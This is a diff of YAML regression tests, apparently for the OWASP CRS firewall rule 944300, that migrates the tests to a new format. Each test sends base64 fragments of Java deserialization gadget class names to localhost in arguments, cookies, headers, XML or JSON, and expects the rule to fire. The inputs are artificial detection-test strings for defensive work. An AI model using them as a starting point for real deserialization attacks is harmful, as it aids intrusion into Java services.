desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-96 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 96 desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-97 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 97 desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - test_title: 944300-98 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=BjbG9uZXRyYW5zZm9ybWVy" + output: + log: + expect_ids: [944300] + - test_id: 98 desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" + output: + log: + expect_ids: [944300] + - test_id: 99 desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 100 desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 101 desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ=test" + output: + log: + expect_ids: [944300] + - test_id: 102 desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 103 desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Zm9yY2xvc3VyZQ=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 104 desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Zm9yY2xvc3VyZQ + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 105 desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 106 desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-107 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 107 desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 108 desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - test_title: 944300-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Zm9yY2xvc3VyZQ" + output: + log: + expect_ids: [944300] + - test_id: 109 desc: "Content-Type application/json arg value includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}" + output: + log: + expect_ids: [944300] + - test_id: 110 desc: "Content-Type application/json arg name includes keyword Zm9yY2xvc3VyZQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 111 desc: "Argument test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 112 desc: "Argument name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU=test" - output: - log_contains: "id \"944300\"" - - test_title: 944300-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU=test" + output: + log: + expect_ids: [944300] + - test_id: 113 desc: "Cookie test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 114 desc: "Cookie name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GZvcmNsb3N1cmU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: GZvcmNsb3N1cmU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 115 desc: "Request header test includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GZvcmNsb3N1cmU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-116 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: GZvcmNsb3N1cmU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + output: + log: + expect_ids: [944300] + - test_id: 116 desc: "XML attribute value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - test_title: 944300-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944300] + - test_id: 117 desc: "XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 118 desc: "Nested XML element value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 119 desc: "Content-Type text/plain includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=GZvcmNsb3N1cmU" - output: - log_contains: "id \"944300\"" - - test_title: 944300-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=GZvcmNsb3N1cmU" + output: + log: + expect_ids: [944300] + - test_id: 120 desc: "Content-Type application/json arg value includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"GZvcmNsb3N1cmU\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log: + expect_ids: [944300] + - test_id: 121 desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"GZvcmNsb3N1cmU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - test_title: 944300-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log: + expect_ids: [944300] + - test_id: 122 desc: "Argument test includes keyword Bmb3JjbG9zdXJl" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 